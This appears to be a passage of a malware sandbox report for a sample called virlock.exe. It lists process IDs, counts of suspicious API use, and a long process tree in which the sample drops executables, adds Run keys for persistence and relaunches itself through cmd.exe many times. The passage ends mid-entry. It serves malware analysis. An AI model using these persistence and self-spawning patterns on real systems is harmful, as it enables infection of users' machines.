2996	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2996	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2996	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
836	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
836	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
836	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
836	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1028	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1028	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1028	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1028	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3296	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3296	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3296	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3296	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4316	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4316	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4316	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4316	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2696	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2696	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2696	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2696	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2424	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2424	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2424	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2424	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1488	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1488	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1488	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1488	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3436	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3436	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3436	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3436	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mMsUIEsc.exe

pid process

1056 mMsUIEsc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

mMsUIEsc.exe

pid	process
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe
1056	mMsUIEsc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.execmd.execmd.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.execmd.execmd.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.execmd.exe

description	pid	process	target process
PID 1128 wrote to memory of 1056	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	mMsUIEsc.exe
PID 1128 wrote to memory of 1056	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	mMsUIEsc.exe
PID 1128 wrote to memory of 1056	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	mMsUIEsc.exe
PID 1128 wrote to memory of 2204	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	MaIgMwUc.exe
PID 1128 wrote to memory of 2204	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	MaIgMwUc.exe
PID 1128 wrote to memory of 2204	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	MaIgMwUc.exe
PID 1128 wrote to memory of 1776	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1128 wrote to memory of 1776	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1128 wrote to memory of 1776	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1776 wrote to memory of 3372	1776	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 1776 wrote to memory of 3372	1776	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 1776 wrote to memory of 3372	1776	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 1128 wrote to memory of 4212	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 4212	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 4212	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2748	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2748	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2748	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2092	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2092	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 2092	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 1128 wrote to memory of 4800	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1128 wrote to memory of 4800	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1128 wrote to memory of 4800	1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4800 wrote to memory of 4464	4800	cmd.exe	cscript.exe
PID 4800 wrote to memory of 4464	4800	cmd.exe	cscript.exe
PID 4800 wrote to memory of 4464	4800	cmd.exe	cscript.exe
PID 3372 wrote to memory of 1608	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 3372 wrote to memory of 1608	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 3372 wrote to memory of 1608	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1608 wrote to memory of 4944	1608	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 1608 wrote to memory of 4944	1608	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 1608 wrote to memory of 4944	1608	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
PID 3372 wrote to memory of 2636	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 2636	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 2636	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 4000	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 4000	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 4000	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 1944	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 1944	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 1944	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 3372 wrote to memory of 1012	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 3372 wrote to memory of 1012	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 3372 wrote to memory of 1012	3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 1012 wrote to memory of 4372	1012	cmd.exe	cscript.exe
PID 1012 wrote to memory of 4372	1012	cmd.exe	cscript.exe
PID 1012 wrote to memory of 4372	1012	cmd.exe	cscript.exe
PID 4944 wrote to memory of 4524	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4944 wrote to memory of 4524	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4944 wrote to memory of 4524	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4944 wrote to memory of 920	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 920	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 920	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 4136	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 4136	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 4136	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 3696	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 3696	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 3696	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	reg.exe
PID 4944 wrote to memory of 3296	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4944 wrote to memory of 3296	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4944 wrote to memory of 3296	4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe	cmd.exe
PID 4524 wrote to memory of 3328	4524	cmd.exe	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1128

C:\Users\Admin\YakwQIkc\mMsUIEsc.exe
"C:\Users\Admin\YakwQIkc\mMsUIEsc.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:1056

C:\ProgramData\ZMwYEkUY\MaIgMwUc.exe
"C:\ProgramData\ZMwYEkUY\MaIgMwUc.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
2⤵
- Suspicious use of WriteProcessMemory
PID:1776

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
4⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
6⤵
- Suspicious use of WriteProcessMemory
PID:4524

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
8⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
10⤵
PID:764

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:4580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
12⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
13⤵
- Suspicious behavior: EnumeratesProcesses
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
14⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
15⤵
- Suspicious behavior: EnumeratesProcesses
PID:836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
16⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
17⤵
- Suspicious behavior: EnumeratesProcesses
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
18⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
19⤵
- Suspicious behavior: EnumeratesProcesses
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
20⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
21⤵
- Suspicious behavior: EnumeratesProcesses
PID:4316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
22⤵
PID:320

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
23⤵
- Suspicious behavior: EnumeratesProcesses
PID:2696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
24⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
25⤵
- Suspicious behavior: EnumeratesProcesses
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
26⤵
PID:2720

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
27⤵
- Suspicious behavior: EnumeratesProcesses
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
28⤵
PID:4336

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
29⤵
- Suspicious behavior: EnumeratesProcesses
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
30⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
31⤵
- Suspicious behavior: EnumeratesProcesses
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
32⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
33⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
34⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
35⤵
PID:548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
36⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
37⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
38⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
39⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
40⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
41⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
42⤵
PID:2904

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
43⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
44⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
45⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
46⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
47⤵
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
48⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
49⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
50⤵
PID:2784

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
51⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
52⤵
PID:1140

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
53⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
54⤵
PID:3292

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
55⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
56⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
57⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
58⤵
PID:1772

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
59⤵
PID:3220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
60⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
61⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
62⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
63⤵
PID:4104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock"
64⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock
65⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
